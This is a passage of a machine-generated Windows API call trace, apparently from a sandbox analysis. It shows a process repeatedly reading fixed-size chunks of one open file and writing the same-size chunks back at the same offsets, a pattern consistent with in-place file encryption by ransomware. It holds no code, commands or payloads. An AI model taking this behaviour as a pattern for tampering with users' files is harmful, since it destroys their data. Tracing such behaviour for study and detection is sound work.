WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.632] GetProcessHeap () returned 0x500000 [0121.632] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.632] GetProcessHeap () returned 0x500000 [0121.632] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.632] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6cb8080, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.632] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.642] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6cb8080, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.642] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.643] GetProcessHeap () returned 0x500000 [0121.643] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.643] GetProcessHeap () returned 0x500000 [0121.643] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.643] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6cf5110, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.643] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.662] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6cf5110, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.662] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.663] GetProcessHeap () returned 0x500000 [0121.663] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.663] GetProcessHeap () returned 0x500000 [0121.663] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.663] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6d321a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.663] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.673] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6d321a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.673] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.674] GetProcessHeap () returned 0x500000 [0121.674] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.674] GetProcessHeap () returned 0x500000 [0121.674] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.674] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6d6f230, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.674] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.684] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6d6f230, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.684] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.684] GetProcessHeap () returned 0x500000 [0121.685] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.685] GetProcessHeap () returned 0x500000 [0121.685] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.685] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6dac2c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.685] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.697] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6dac2c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.697] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.698] GetProcessHeap () returned 0x500000 [0121.698] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.698] GetProcessHeap () returned 0x500000 [0121.698] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.698] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6de9350, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.698] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.716] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6de9350, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.717] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.718] GetProcessHeap () returned 0x500000 [0121.718] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.718] GetProcessHeap () returned 0x500000 [0121.718] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.718] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6e263e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.718] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.729] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6e263e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.729] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.730] GetProcessHeap () returned 0x500000 [0121.730] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.730] GetProcessHeap () returned 0x500000 [0121.730] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.730] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6e63470, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.730] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.740] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6e63470, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.741] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.741] GetProcessHeap () returned 0x500000 [0121.741] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.741] GetProcessHeap () returned 0x500000 [0121.741] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.741] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6ea0500, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.741] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.752] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6ea0500, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.752] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.752] GetProcessHeap () returned 0x500000 [0121.752] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.752] GetProcessHeap () returned 0x500000 [0121.752] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.752] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6edd590, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.752] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.763] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6edd590, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.763] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.764] GetProcessHeap () returned 0x500000 [0121.764] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.764] GetProcessHeap () returned 0x500000 [0121.764] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.764] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6f1a620, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.764] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.785] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6f1a620, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.785] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.786] GetProcessHeap () returned 0x500000 [0121.786] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.786] GetProcessHeap () returned 0x500000 [0121.786] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.786] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6f576b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.786] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.796] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6f576b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.796] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.797] GetProcessHeap () returned 0x500000 [0121.797] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.797] GetProcessHeap () returned 0x500000 [0121.797] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.797] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6f94740, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.797] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.808] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6f94740, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.808] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.808] GetProcessHeap () returned 0x500000 [0121.808] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.808] GetProcessHeap () returned 0x500000 [0121.808] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.808] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6fd17d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.808] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.825] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6fd17d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.826] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.826] GetProcessHeap () returned 0x500000 [0121.826] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.826] GetProcessHeap () returned 0x500000 [0121.826] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.826] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x700e860, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.826] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.845] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x700e860, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.845] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.846] GetProcessHeap () returned 0x500000 [0121.846] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.846] GetProcessHeap () returned 0x500000 [0121.846] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.846] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x704b8f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.846] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.855] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x704b8f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.855] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.856] GetProcessHeap () returned 0x500000 [0121.856] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.856] GetProcessHeap () returned 0x500000 [0121.856] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.856] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7088980, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.856] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.865] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7088980, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.865] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.866] GetProcessHeap () returned 0x500000 [0121.866] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.866] GetProcessHeap () returned 0x500000 [0121.866] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.866] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x70c5a10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.866] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.877] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x70c5a10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.877] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.878] GetProcessHeap () returned 0x500000 [0121.878] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.878] GetProcessHeap () returned 0x500000 [0121.878] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.878] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7102aa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.878] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.893] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x7102aa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.893] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.894] GetProcessHeap () returned 0x500000 [0121.894] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.894] GetProcessHeap () returned 0x500000 [0121.894] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.894] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x713fb30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.894] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.930] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x713fb30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.930] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.930] GetProcessHeap () returned 0x500000 [0121.930] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.930] GetProcessHeap () returned 0x500000 [0121.930] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.930] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x717cbc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.930] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.940] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x717cbc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.940] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.941] GetProcessHeap () returned 0x500000 [0121.941] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.941] GetProcessHeap () returned 0x500000 [0121.941] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.941] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x71b9c50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.941] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.951] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x71b9c50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.951] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.952] GetProcessHeap () returned 0x500000 [0121.952] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.952] GetProcessHeap () returned 0x500000 [0121.952] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.952] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x71f6ce0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.952] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.971] SetFilePointerEx (in: 